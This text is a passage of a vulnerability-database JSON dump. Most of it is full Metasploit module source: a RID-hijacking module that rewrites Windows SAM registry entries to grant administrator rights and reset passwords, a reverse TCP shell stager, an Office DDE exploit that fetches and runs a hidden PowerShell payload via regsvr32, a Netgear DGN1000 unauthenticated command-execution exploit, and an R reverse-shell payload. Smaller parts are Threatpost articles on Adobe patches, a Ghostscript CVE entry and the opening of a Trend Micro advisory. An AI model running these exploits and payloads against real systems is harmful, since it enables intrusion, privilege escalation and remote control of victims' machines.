bytes)\n interface['guid'] = 
@host_process.memory.read(pointer,16)\n pointer = (pointer + 16)\n #Read the description(up to 512 bytes)\n interface['description'] = @host_process.memory.read(pointer,512)\n pointer = (pointer + 512)\n #Read the state of the interface (4 bytes)\n state = @host_process.memory.read(pointer,4)\n pointer = (pointer + 4)\n #Turn the state into human readable form\n state = state.unpack(\"V\")[0]\n case state\n when 0\n interface['state'] = \"The interface is not ready to operate.\"\n when 1\n interface['state'] = \"The interface is connected to a network.\"\n when 2\n interface['state'] = \"The interface is the first node in an ad hoc network. No peer has connected.\"\n when 3\n interface['state'] = \"The interface is disconnecting from the current network.\"\n when 4\n interface['state'] = \"The interface is not connected to any network.\"\n when 5\n interface['state'] = \"The interface is attempting to associate with a network.\"\n when 6\n interface['state'] = \"Auto configuration is discovering the settings for the network.\"\n when 7\n interface['state'] = \"The interface is in the process of authenticating.\"\n else\n interface['state'] = \"Unknown State\"\n end\n interfaces << interface\n end\n return interfaces\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/wlan/wlan_probe_request.rb"}, {"lastseen": "2019-12-02T20:07:29", "bulletinFamily": "exploit", "description": "This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine. 
Taking advantage of some Windows Local Users Management integrity issues, this module allows authenticating with the credentials of one known account (such as the GUEST account) and gaining access with the privileges of another existing account (such as the ADMINISTRATOR account), even if the spoofed account is disabled.\n", "modified": "2018-04-03T02:57:41", "published": "2018-02-20T21:29:23", "id": "MSF:POST/WINDOWS/MANAGE/RID_HIJACK", "href": "", "type": "metasploit", "title": "Windows Manage RID Hijacking", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Post::Windows::Priv\n\n def initialize\n super(\n 'Name' => 'Windows Manage RID Hijacking',\n 'Description' => %q{\n This module will create an entry on the target by modifying some properties\n of an existing account. It will change the account attributes by setting a\n Relative Identifier (RID), which should be owned by one existing\n account on the destination machine.\n\n Taking advantage of some Windows Local Users Management integrity issues,\n this module will allow to authenticate with one known account\n credentials (like GUEST account), and access with the privileges of another\n existing account (like ADMINISTRATOR account), even if the spoofed account is\n disabled.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'Sebastian Castro <sebastian.castro[at]cslcolombia.com>',\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'References'\t=> [\n ['URL', 'http://csl.com.co/rid-hijacking/']\n ])\n\n register_options(\n [\n OptBool.new('GETSYSTEM', [true, 'Attempt to get SYSTEM privilege on the target host.', false]),\n OptBool.new('GUEST_ACCOUNT', [true, 'Assign the defined RID to the Guest Account.', false]),\n OptString.new('USERNAME', [false, 'User to set the defined RID.']),\n OptString.new('PASSWORD', [false, 
'Password to set to the defined user account.']),\n OptInt.new('RID', [true, 'RID to set to the specified account.', 500])\n ]\n )\n end\n\n def getsystem\n results = session.priv.getsystem\n if results[0]\n return true\n else\n return false\n end\n end\n\n def get_name_from_rid(reg_key, rid, names_key)\n names_key.each do |name|\n skey = registry_getvalinfo(reg_key + \"\\\\Names\\\\#{name}\", \"\")\n rid_user = skey['Type']\n return name if rid_user == rid\n end\n return nil\n end\n\n def get_user_rid(reg_key, username, names_key)\n names_key.each do |name|\n next unless name.casecmp(username).zero?\n print_good(\"Found #{name} account!\")\n skey = registry_getvalinfo(reg_key + \"\\\\Names\\\\#{name}\", \"\")\n rid = skey['Type']\n if !skey\n print_error(\"Could not open user's key\")\n return -1\n end\n return rid\n end\n return -1\n end\n\n def check_active(fbin)\n if fbin[0x38].unpack(\"H*\")[0].to_i != 10\n return true\n else\n return false\n end\n end\n\n def swap_rid(fbin, rid)\n # This function will set hex format to a given RID integer\n hex = [format(\"%04x\", rid).scan(/.{2}/).reverse.join].pack(\"H*\")\n # Overwrite new RID at offset 0x30\n fbin[0x30, 2] = hex\n return fbin\n end\n\n def run\n # Registry key to manipulate\n reg_key = 'HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users'\n\n # Checks privileges of the session, and tries to get SYSTEM privileges if needed.\n print_status(\"Checking for SYSTEM privileges on session\")\n if !is_system?\n if datastore['GETSYSTEM']\n print_status(\"Trying to get SYSTEM privileges\")\n if getsystem\n print_good(\"Got SYSTEM privileges\")\n else\n print_error(\"Could not obtain SYSTEM privileges\")\n return\n end\n else\n print_error(\"Session is not running with SYSTEM privileges. 
Try setting GETSYSTEM \")\n return\n end\n else\n print_good(\"Session is already running with SYSTEM privileges\")\n end\n\n # Checks the Windows Version.\n wver = sysinfo[\"OS\"]\n print_status(\"Target OS: #{wver}\")\n\n # Load the usernames from SAM Registry key\n names_key = registry_enumkeys(reg_key + '\\\\Names')\n unless names_key\n print_error(\"Could not access to SAM registry keys\")\n return\n end\n\n # If username is set, looks for it in SAM registry key\n user_rid = -1\n username = datastore['USERNAME']\n if datastore['GUEST_ACCOUNT']\n user_rid = 0x1f5\n print_status(\"Target account: Guest Account\")\n username = get_name_from_rid(reg_key, user_rid, names_key)\n else\n if datastore['USERNAME'].to_s.empty?\n print_error(\"You must set an username or enable GUEST_ACCOUNT option\")\n return\n end\n print_status('Checking users...')\n user_rid = get_user_rid(reg_key, datastore['USERNAME'], names_key)\n end\n\n # Result of the RID harvesting\n if user_rid == -1\n print_error(\"Could not find the specified username\")\n return\n else\n print_status(\"Target account username: #{username}\")\n print_status(\"Target account RID: #{user_rid}\")\n end\n\n # Search the Registry associated to the user's RID and overwrites it\n users_key = registry_enumkeys(reg_key)\n users_key.each do |r|\n next if r.to_i(16) != user_rid\n f = registry_getvaldata(reg_key + \"\\\\#{r}\", \"F\")\n if check_active(f)\n print_status(\"Account is disabled, activating...\")\n f[0x38] = [\"10\"].pack(\"H\")\n print_good(\"Target account enabled\")\n else\n print_good(\"Target account is already enabled\")\n end\n\n print_status(\"Overwriting RID\")\n # Overwrite RID to specified RID\n f = swap_rid(f, datastore['RID'])\n\n open_key = registry_setvaldata(reg_key + \"\\\\#{r}\", \"F\", f, \"REG_BINARY\")\n unless open_key\n print_error(\"Can't write to registry... 
Something's wrong!\")\n return -1\n end\n print_good(\"The RID #{datastore['RID']} is set to the account #{username} with original RID #{user_rid}\")\n end\n # If set, changes the specified username's password\n if datastore['PASSWORD']\n print_status(\"Setting #{username} password to #{datastore['PASSWORD']}\")\n cmd = cmd_exec('cmd.exe', \"/c net user #{username} #{datastore['PASSWORD']}\")\n vprint_status(cmd.to_s)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/manage/rid_hijack.rb"}, {"lastseen": "2019-11-13T17:25:47", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker\n", "modified": "2018-03-04T23:43:15", "published": "2018-02-04T07:01:27", "id": "MSF:PAYLOAD/WINDOWS/X64/SHELL/REVERSE_TCP_RC4", "href": "", "type": "metasploit", "title": "Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/x64/reverse_tcp_rc4'\n\n\nmodule MetasploitModule\n\n CachedSize = 585\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4_x64\n\n def self.handler_type_alias\n \"reverse_tcp_rc4\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'max3raza', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockrdi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, 
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb"}, {"lastseen": "2019-11-28T14:42:32", "bulletinFamily": "exploit", "description": "This module generates a DDE command to place within a Word document that, when executed, will retrieve an HTA payload via HTTP from a web server.\n", "modified": "2017-12-07T19:44:36", "published": "2017-12-07T03:40:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_DDE_DELIVERY", "href": "", "type": "metasploit", "title": "Microsoft Office DDE Payload Delivery", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office DDE Payload Delivery',\n 'Description' => %q{\n This module generates an DDE command to place within\n a word document, that when executed, will retrieve a HTA payload\n via HTTP from an web server.\n },\n 'Author' => 'mumbai',\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Oct 9 2017',\n 'References' => [\n ['URL', 'https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563'],\n ['URL', 'https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/']\n ],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win',\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' =>\n [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'DisablePayloadHandler' => false,\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp',\n 'EXITFUNC' => 'thread'\n }\n ))\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as\", \"msf.rtf\"]),\n 
OptPath.new(\"INJECT_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#(unknown)'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the 
provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n def retrieve_header(filename)\n if (not datastore['INJECT_PATH'].nil?)\n path = \"#{datastore['INJECT_PATH']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n ::File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9' + \"\\n\"\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9' + \"\\n\"\n end\n return header\n end\n\n def create_rtf\n #\n header = retrieve_header(datastore['FILENAME'])\n field_class = '{\\field{\\*\\fldinst {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0 \\insrsid3807165 '\n field_class << \"DDEAUTO 
C:\\\\\\\\\\\\\\\\Programs\\\\\\\\\\\\\\\\Microsoft\\\\\\\\\\\\\\\\Office\\\\\\\\\\\\\\\\MSword.exe\\\\\\\\\\\\\\\\..\\\\\\\\\\\\\\\\..\\\\\\\\\\\\\\\\..\\\\\\\\\\\\\\\\..\\\\\\\\\\\\\\\\Windows\\\\\\\\\\\\\\\\System32\\\\\\\\\\\\\\\\cmd.exe \\\"/c regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\\\" }}\"\n field_class << '{\\fldrslt }}\\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sftnbj {\\rtlch\\fcs1 \\af31507 \\ltrch\\fcs0' + \"\\n\"\n field_class << '\\insrsid5790315' + \"\\n\"\n field_class << '\\par }'\n footer = '}}' # footer\n rtf = header + field_class + footer\n rtf\n end\n\n def primer\n file_create(create_rtf)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_dde_delivery.rb"}, {"lastseen": "2019-10-22T03:49:35", "bulletinFamily": "exploit", "description": "This module exploits an unauthenticated OS command execution vulneralbility in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and DGN2000v1 models.\n", "modified": "2017-11-11T00:15:22", "published": "2017-10-19T01:37:26", "id": "MSF:EXPLOIT/LINUX/HTTP/NETGEAR_DGN1000_SETUP_UNAUTH_EXEC", "href": "", "type": "metasploit", "title": "Netgear DGN1000 Setup.cgi Unauthenticated RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',\n 'Description' => %q{\n This module exploits an unauthenticated OS command execution vulneralbility\n in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and\n DGN2000v1 models.\n },\n 'Author' => [\n 'Mumbai', # 
https://github.com/realoriginal (module)\n 'Robort Palerie <roberto@greyhats.it>' # vuln discovery\n ],\n 'References' => [\n ['EDB', '25978'],\n ],\n 'DisclosureDate' => 'Jun 5 2013',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSBE,\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'\n },\n 'Privileged' => true,\n 'Payload' => {\n 'DisableNops' => true,\n },\n 'Targets' => [[ 'Automatic', {} ]],\n ))\n end\n\n def check\n begin\n res = send_request_cgi({\n 'uri' => '/setup.cgi',\n 'method' => 'GET'\n })\n if res && res.headers['WWW-Authenticate']\n auth = res.headers['WWW-Authenticate']\n if auth =~ /DGN1000/\n return Exploit::CheckCode::Detected\n end\n end\n rescue ::Rex::ConnectionError\n return Exploit::CheckCode::Unknown\n end\n Exploit::CheckCode::Unknown\n end\n\n def exploit\n print_status(\"#{peer} - Connecting to target...\")\n\n unless check == Exploit::CheckCode::Detected\n fail_with(Failure::Unknown, \"#{peer} - Failed to access vulnerable URL\")\n end\n\n print_status(\"#{peer} - Exploiting target ....\")\n execute_cmdstager(\n :flavor => :wget,\n :linemax => 200,\n :concat_operator => \" && \"\n )\n end\n\n def execute_command(cmd, opts)\n begin\n res = send_request_cgi({\n 'uri' => '/setup.cgi',\n 'method' => 'GET',\n 'vars_get' => {\n 'next_file' => 'netgear.cfg',\n 'todo' => 'syscmd',\n 'cmd' => cmd.to_s,\n 'curpath' => '/',\n 'currentsetting.htm' => '1'\n }\n })\n return res\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb"}, {"lastseen": "2019-12-02T14:15:20", "bulletinFamily": "exploit", "description": "Connect back and create a command shell via R\n", "modified": "2017-08-28T10:30:30", "published": 
"2017-08-21T01:25:57", "id": "MSF:PAYLOAD/CMD/UNIX/REVERSE_R", "href": "", "type": "metasploit", "title": "Unix Command Shell, Reverse TCP (via R)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/payload/r'\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 157\n\n include Msf::Payload::Single\n include Msf::Payload::R\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Unix Command Shell, Reverse TCP (via R)',\n 'Description' => 'Connect back and create a command shell via R',\n 'Author' => [ 'RageLtMan' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'R',\n 'Payload' => { 'Offsets' => {}, 'Payload' => '' }\n ))\n end\n\n def generate\n return prepends(r_string)\n end\n\n def prepends(r_string)\n return \"R -e \\\"#{r_string}\\\"\"\n end\n\n def r_string\n lhost = datastore['LHOST']\n lhost = \"[#{lhost}]\" if Rex::Socket.is_ipv6?(lhost)\n return \"s<-socketConnection(host='#{lhost}',port=#{datastore['LPORT']},\" +\n \"blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines\" +\n \"(pipe(readLines(s, 1))),s)}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/unix/reverse_r.rb"}], "threatpost": [{"lastseen": "2019-11-04T07:14:46", "bulletinFamily": "info", "description": "Adobe released patches for two bugs rated \u201cimportant\u201d in its Adobe Digital Edition and Adobe Connect products.\n\nThe two 
[important](<https://helpx.adobe.com/security/products/Digital-Editions/apsb19-04.html>) vulnerabilities, patched Tuesday, include an information disclosure bug in Adobe\u2019s ebook reader software program, Digital Edition; as well as a session token exposure bug in its presentation and web conferencing software, Adobe Connect.\n\nThe \u201cimportant\u201d out of bounds read bug, [CVE-2018-12817](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-12817>), is an information disclosure vulnerability impacting Adobe Digital Edition versions 4.5.9 and earlier, for Windows, macOS, iOS and Android. Jaanus K\u00e4\u00e4p of Clarified Security was credited with discovering the issue.\n\n\u201cAdobe has released a security update for Adobe Digital Editions,\u201d according to Adobe\u2019s release. \u201cThis update resolves an important vulnerability. Successful exploitation could lead to information disclosure in the context of the current user.\u201d\n\nUsers are urged to update Adobe Digital Editions to 4.5.10 in a priority 3 update \u2013 meaning that it \u201cresolves vulnerabilities in a product that has historically not been a target for attackers\u201d according to Adobe.\n\nThe other bug, an \u201cimportant\u201d session token exposure glitch in [Adobe Connect](<https://helpx.adobe.com/security/products/connect/apsb19-05.html>), (CVE-2018-19718) could enable exposure of the privileges granted to a session. Impacted are Adobe Connect versions 9.8.1 and earlier on all platforms. Users are urged to update to Adobe Connect 10.1 in a priority 3 update.\n\nAdobe said that it is not aware of current exploits for either of these vulnerabilities.\n\nThe update comes on the heels of a slew of unscheduled fixes for Adobe Acrobat and Reader for Windows and MacOS [last week](<https://threatpost.com/adobe-critical-acrobat-reader-flaws/140547/>). The [updates](<https://blogs.adobe.com/psirt/?p=1682>) fixed two critical vulnerabilities, CVE-2018-16011 and CVE-2018-19725. 
Successful exploitation of the flaws could lead to [arbitrary code execution](<https://helpx.adobe.com/security/products/acrobat/apsb19-02.html>) in the context of the current user.\n\nThe patch also comes on the heels of a busy December for Adobe. The company patched 87 vulnerabilities for Acrobat and Reader in its [December Patch Tuesday](<https://threatpost.com/adobe-december-2018-patch-tuesday/139792/>) update, including a slew of critical flaws that would allow arbitrary code-execution.\n\n\u201cClosing out 2018, Adobe Flash had two Zero Day vulnerabilities in late November (CVE-2018-15981) and early December (CVE-2018-15982),\u201d Chris Goettl, director of product management for Security at Ivanti, told Threatpost. \u201cEnsure that Adobe Acrobat, Reader, and Flash Player are part of your monthly maintenance for January.\u201d\n", "modified": "2019-01-08T14:48:36", "published": "2019-01-08T14:48:36", "id": "THREATPOST:8262C6E0DB15A17DC749BCD1D3C68AED", "href": "https://threatpost.com/adobe-patches-important-bugs-in-connect-and-digital-edition/140635/", "type": "threatpost", "title": "Adobe Patches Important Bugs in Connect and Digital Edition", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:29", "bulletinFamily": "info", "description": "Adobe on Thursday released unscheduled security updates for Adobe Acrobat and Reader for Windows and MacOS.\n\nThe [updates](<https://blogs.adobe.com/psirt/?p=1682>) fix two critical vulnerabilities, CVE-2018-16011 and CVE-2018-19725. Successful exploitation of the flaws could lead to [arbitrary code execution](<https://helpx.adobe.com/security/products/acrobat/apsb19-02.html>) in the context of the current user.\n\nThe first vulnerability, CVE-2018-16011, reported by Sebastian Apelt in conjunction with the Zero Day Initiative, is a critical use-after-free flaw that could enable arbitrary code-execution. 
The vulnerability had been addressed in a separate issue included in a [previous Adobe advisory](<https://www.qualys.com/research/security-alerts/2018-12-11/adobe/>).\n\nThe second flaw, CVE-2018-19725, reported by Abdul Aziz Hariri, is a critical security bypass vulnerability that allows privilege escalation. That flaw \u201cis a security feature bypass that would allow a privilege escalation, giving an attacker broader access to the system affected,\u201d Chris Goettl, director of product management, security, at Ivanti, told Threatpost.\n\nImpacted are Acrobat DC and Acrobat Reader DC versions 2019.010.20064 and earlier; Acrobat 2017 and Acrobat Reader 2017 versions 2017.011.30110 and earlier; and Acrobat DC and Acrobat Reader DC versions 2015.006.30461 and earlier.\n\nThe patches are a priority 2, meaning that there are no known exploits for the vulnerabilities; but they exist in products that have historically been \u201cat elevated risk,\u201d according to Adobe.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/01/03163151/adobe.png>)\n\nAdobe recommends users update to Adobe Acrobat and Reader versions 2019.010.20069, Acrobat 2017 and Acrobat Reader 2017.011.30113 and Acrobat DC and Acrobat Reader DC 2015.006.30464.\n\nThe patch comes on the heels of a busy December for Adobe. The company patched 87 vulnerabilities for Acrobat and Reader in its [December Patch Tuesday](<https://threatpost.com/adobe-december-2018-patch-tuesday/139792/>) update, including a slew of critical flaws that would allow arbitrary code-execution. 
Beyond that, Adobe Flash had two Zero Day vulnerabilities in late November (CVE-2018-15981) and early [December](<https://threatpost.com/zero-day-microsoft-december-patch-tuesday/139826/>) (CVE-2018-15982).\n\n\u201cBetween this update and the December _[APSB18-41](<https://helpx.adobe.com/security/products/acrobat/apsb18-41.html>)_, which resolved 87 vulnerabilities, it is recommended to ensure that any Adobe Acrobat and Reader instances are updated in the next two to four weeks,\u201d Goettl told us. \u201cYou can also expect an Adobe Flash Player update next week on Patch Tuesday.\u201d\n\nBoth flaws were reported through Trend Micro\u2019s Zero Day Initiative.\n", "modified": "2019-01-04T12:30:54", "published": "2019-01-04T12:30:54", "id": "THREATPOST:17FD05502596AA5CBE03A5D56D3CA715", "href": "https://threatpost.com/adobe-critical-acrobat-reader-flaws/140547/", "type": "threatpost", "title": "Adobe Fixes Two Critical Acrobat and Reader Flaws", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-10-04T12:26:09", "bulletinFamily": "NVD", "description": "Artifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving errorhandler setup. 
NOTE: this issue exists because of an incomplete fix for CVE-2018-17183.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-17961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17961", "published": "2018-10-15T16:29:00", "title": "CVE-2018-17961", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-02T09:36:26", "bulletinFamily": "exploit", "description": "Trend Micro IMSVA Management Portal version 9.1.0.1600 suffers from an authentication bypass vulnerability.", "modified": "2018-02-10T00:00:00", "published": "2018-02-10T00:00:00", "href": "https://0day.today/exploit/description/29759", "id": "1337DAY-ID-29759", "title": "Trend Micro IMSVA Management Portal 9.1.0.1600 Authentication Bypass Exploit", "type": "zdt", "sourceData": "Title: Trend Micro IMSVA Management Portal Authentication Bypass\r\nAdvisory ID: KL-001-2018-006\r\nPublication Date: 2018.02.08\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-006.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Trend Micro\r\n Affected Product: InterScan Mail Security Virtual Appliance\r\n Affected Version: 9.1.0.1600\r\n Platform: Embedded Linux\r\n CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-219: Sensitive Data Under Web Root\r\n Impact: Authentication Bypass\r\n Attack vector: HTTPS\r\n\r\n2. Vulnerability Description\r\n\r\n Any unauthenticated user can bypass the authentication process.\r\n\r\n3. Technical Description\r\n\r\n The web application is plugin-based and allows widgets to\r\n be loaded into the application. A plugin which is loaded by\r\n default stores a log file of events in a directory which can be\r\n accessed by unauthenticated users. Files within this directory\r\n (such as /widget/repository/log/diagnostic.log) which contain\r\n cookie values can then be read, parsed, and session information\r\n extracted. 
A functional exploit is shown below.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n Trend Micro has released a Critical Patch update to the\r\n affected versions for this vulnerability. The advisory and\r\n links to the patch(es) are available from the following URL:\r\n\r\n https://success.trendmicro.com/solution/1119277\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin (@thatguylevel)\r\n of KoreLogic, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2017.08.11 - KoreLogic submits vulnerability details to Trend Micro.\r\n 2017.08.11 - Trend Micro confirms receipt.\r\n 2017.09.15 - KoreLogic asks for an update on the triage of the\r\n reported issue.\r\n 2017.09.15 - Trend Micro informs KoreLogic that the issue is in\r\n remediation but there is no expected release date yet.\r\n 2017.09.25 - 30 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.10.06 - Trend Micro informs KoreLogic that the issue will not\r\n be addressed before the 45 business-day deadline. They\r\n ask for additional time for the details to remain\r\n embargoed in order to complete QA on the proposed fix.\r\n 2017.10.06 - KoreLogic agrees to extend the disclosure timeline.\r\n 2017.10.17 - 45 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.11.02 - Trend Micro notifies KoreLogic that the Critical Patch\r\n for IMSVA 9.1 (Critical Patch 1682) has gone live,\r\n but they are still working on the patch for IMSVA 9.0.\r\n 2017.11.07 - 60 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.12.21 - 90 business days have elapsed since the vulnerability\r\n was reported to Trend Micro.\r\n 2017.12.28 - Trend Micro notifies KoreLogic that the IMSVA 9.0\r\n Critical Patch is being localized for foreign language\r\n customers. 
